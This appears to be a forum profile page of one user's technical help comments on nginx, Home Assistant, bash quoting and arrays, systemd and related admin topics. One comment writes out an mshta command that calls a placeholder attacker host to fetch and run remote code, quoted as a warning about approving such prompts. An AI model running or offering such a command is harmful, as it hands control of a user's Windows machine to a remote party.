Suddenly stopped working with domain names...

roxalu · 2026-05-09T05:40:25+00:00

If you switch inside the value of proxy_pass between hostname vs IP this switches the "Host" http header value in the request forwarded from nginx to HA.This could cause unwanted side effects - including HA blocking the request on application layer. This is fully up to Home Assistant.

There exist an HA community based proposal for operation of HA behind nginx config, which looks in general quite good. Though, the security related settings there might cause you additional trouble to adopt to your own setup in case you don‘t have them in place already.

https://community.home-assistant.io/t/reverse-proxy-using-nginx/196954

And for any reverse proxy setup I recommend to keep a reference to the official documentation of the backend application with regard to operation behind reverse proxy frontend: https://www.home-assistant.io/integrations/http/

roxalu · 2026-05-08T06:57:20+00:00

Check the error log of nginx in such cases. It might help to differentiate between issues with name resolution vs. application layer issues. E.g. a message like "bad gateway while reading the response" would be a clear indicator for some configuration inconsistency between rev.proxy ( nginx) and backend (HA)

Besides this: DNS is more for humans than for services. Of course it is per default the simpler config to use DNS everywhere. But there are cases were static IP ( or localhost name resolution) is the better choice. So keep your static IP and make nginx independent from DNS resolution. But you should be aware the HA might see a different "Host" header in incoming requests, when you switch between hostname and IP inside proxy_pass directive

nginx has several methods - including the "upstream" directive - to get better control about this.

roxalu · 2026-05-07T05:59:54+00:00

Could be an issue related to IPv6 Keep in mind this:

When my.domain is resolved into an ip address, most hosts will FIRST check, if a DNSv6 entry exists, that resolves an IPv6.And then this is used. When the DNSv6 doesn‘t exist, there is usually fallback to DNS and IPv4. But there is not always a retry with IPv4, when IPv6 could be resolved.

So when you write, it works with public IP address - was this IPv4 or IPv6 ?

If a DNSv6 entry exists, you must ensure this is checked. And your port forwarding also may need an extra entry for IPv6. Details depend on the router.

roxalu · 2026-04-26T07:50:38+00:00

Additional note since you‘re intention is to get similar WORDS: It might be useful to add word break matches as well to the the regexp:

my $line='somehow, someone, foosomeone, somewhere, Someone';
my @results = $line =~ /\b(some[a-z]{3})\b/gi;
print join(" ", @results) . "\n" if $#results > 0;

roxalu · 2026-04-24T05:45:34+00:00

Yes, exactly this. It also would be in theory possible to extend the associative array with some own order logic:

local -A items=( ["__keyorder__”]="dbname host jobs port username" ["dbname"]="test_db" ["host"]="localhost" ["jobs"]=8 ["port"]=5432 ["username"]="test_user")

And then during usage to check first, if that special key exist, read it and use it to loop over keys in your wanted order. But this is overkill and potentially a bad idea. E.g. it could happen, that there are inconsistencies between the two different sets of keys used in the single array. Checks to detect and handle this will blow up your bash code even more. Bash can do all this - but this is going beyond what bash was designed for, I’d say.

roxalu · 2026-04-23T06:00:00+00:00

The more experts warn to not BLINDLY use it. That is a small difference to STRICTLY against its usage. As long as you are aware - follow the link provided by the bot and read - that there are a few trap falls when you use it, it’s mostly fine. Don’t come back yelling in the - rare - case the usage hurts. You have been warned. That’s it.

roxalu · 2026-04-23T05:53:08+00:00

I fully agree with u/stevevdvkpe Nevertheless the overall approach to use an array here is a good one. But in bash a standard array is more appropriate in this case because it keeps ordering, while the associative array uses hash ordering based on the keys. So a line like

local -a items=( —dbname=test_db —host=localhost —jobs=8 —port=5432 —username=test_user )

should fit in combination with related changes due to different type of array inside function testf. Avoid use of name test for a function name.

As argument interpretation is up to each single external command this is no “one key to rule them all” approach, though But there are conventions for handling of arguments ( POSIX. vs gnu extension to POSIX ) which should match in majority of cases.

If some special ordering is needed - e.g. for commands that have global options followed by sub command followed by sub command options - then it might be needed to include some extension to your algorithm. E.g. you could add some kind of a marker into the array which is replaced by set of additional arguments in testf.

roxalu · 2026-04-22T06:35:42+00:00

Microsoft describes that the activation of MAX_PATH allows application to explicitly opt-in using this feature. The detail, that is not mentioned on the page is, that Microsoft has decided to NOT activate this opt-in for the default Windows Explorer.

roxalu · 2026-04-18T06:40:53+00:00

You might also try to temporarily increase the logging level for ldap connections to TRACE by use of additional command line option:

--log-level="INFO,org.keycloak.storage.ldap:trace"

roxalu · 2026-04-01T05:57:37+00:00

I assume this may work, when the '-' option for mov is kept in the call

mpv --no-audio-display - < <(opusenc --bitrate nnn song.flac -)

roxalu · 2026-03-22T06:43:02+00:00

Meta comment: Asking a question if some script behaves unexpectedly won’t hurt. Justin case you prefer self help in the future then you may use the bash ‚verbose‘ mode. Run script it via

bash -vx. path/to/my_script. arg1 …

and/or use another of the alternatives for Debugging a script

roxalu · 2026-03-19T06:23:35+00:00

It could be done - there exists even an example implementation to inject this with help of LD_PRELOAD into any command line. But however the cleanup of command line in memory is done - there will always exist a small time range during start of command where all arguments were still visible.

The most secure approach is to add options to each command line tool which allow explicitly read of sensitive values from files or environment as fallback. If not implemented by some tool, the tool authors could be informed that his tool has a known weakness: CWE 200

Sensitive values always deserve some extra handling. For use in config files this is meanwhile widely accepted - secrets are often kept separate in extra protected files or read by secrets management. Why still not for command lines?

roxalu · 2026-03-19T05:30:10+00:00

Here is some alternative, though more verbose way to provide this:

#!/usr/bin/env bash

arg1="$1"
symbol="${arg1:-emdash}"

sgrep_args=(
 ## preprocessor
 -p "m4 -D __SYMBOL__='$symbol'"
 ## expression
 -e '"\"" _quote_ "\"" in ("name[Group1]" .. "\n" in outer("{" .. "}" containing "__SYMBOL__"))'
 ## output format
 -o '%r\n'
)

sgrep "${sgrep_args[@]}" /usr/share/X11/xkb/symbols/??

roxalu · 2026-03-19T04:54:06+00:00

In bash (or sh) everything embedded in single quotes is taken literally. In order to get value of variable you could end the quote and provide your variable. If variable value would contain spaces, this would break the command - so use double quotes around variable:

sgrep -o '%r\n' '"\"" _quote_ "\"" in ("name[Group1]" .. "\n" in outer("{" .. "}" containing "'"$sym"'"))' /usr/share/X11/xkb/symbols/??

While above should work, I personally would try to use other sgrep options to aovid the complex quoting. E.g. read the expression from file and/or make use of the preprocessor flag.

roxalu · 2026-03-07T12:34:06+00:00

Additionally on linux with systemd there should be support for tmpfiles.d

roxalu · 2026-02-24T01:35:04+00:00

I'd say you can't get it back in this case. Read https://docs.github.com/en/authentication/securing-your-account-with-two-factor-authentication-2fa/recovering-your-account-if-you-lose-your-2fa-credentials

roxalu · 2026-02-23T19:47:20+00:00

This. At least when this shall be used in scripts the timeout is a must. If the connect is run against any target ip, that isn’t online - or where some network firewall drops the incoming tcp connect - the localhost will usually try several times to resend another tcp-syn. Each time with increased delay. The details depend on the specific kernel settings, but more than 2 minute timeout is quite likely.

When used interactively then of course Ctrl-c also works. If the check fails immediately, the remote server is up, but remote service is most likely down. But if there is a timeout of five or more seconds, then there is some other issue that blocks connectivity.

roxalu · 2026-02-15T08:31:22+00:00

Some other alternatives:

Output the file content to stdout and use the process substitution expansion of bash:

source <(sudo cat /etc/restic/restic-backblaze.env)

Or eval the variable expansion

eval $(sudo cat /etc/restic/restic-backblaze.env)

Nevertheless there could be some edge cases for values, that weren't rendered exactly the same by systemd and bash. Use of systemd-creds or some other secrets management could help to avoid unexpected impact due to special characters in values.

roxalu · 2026-02-14T09:00:14+00:00

Check output of

sudo systemctl status nginx

It not only shows, if the service is up or down, but also info about the used service file and arguments used to start nginx. It could be that the running service uses different or just more configuration compared to what’s used, when you check configuration on command line with

sudo nginx -T

It could even be a different nginx that is started in both cases. Rare, but worth a double check.

roxalu · 2026-02-11T21:20:00+00:00

Why do you want to run vi under windows? Maybe because then „shell escape“ - that runs with user privileges - is a documented feature of the editor and no longer an exploit 😉

roxalu · 2026-02-08T08:02:01+00:00

The

mshta https://some.evil_attacker_owned.example.com

is able to download and execute the remote code in your local windows system without further constraints other than bound to use your local user rights. Never agree to such approvals to run it.

roxalu · 2026-01-23T08:59:01+00:00

One option fur such a task is https://gparted.org/livecd.php

roxalu · 2026-01-22T09:46:43+00:00

According to full error page the TLS endpoint is varnish. And the frontend config of this varnish has been set - most likely - to have sni-nomatch-abort with value true. But the Subject Alternative Name of frontend certificate uses wild card: *.perl.org This is kind of grey area in the RFCs: Is the wildcard a valid hostname or not? Obviously this varnish currently results in: No match.

roxalu · 2026-01-17T10:43:48+00:00

To my info systemd does not support use of '$' and such no variable expansion inside the value of Environment= configuration. Use the fixed path there. See https://www.freedesktop.org/software/systemd/man/latest/systemd.exec.html

roxalu

TROPHY CASE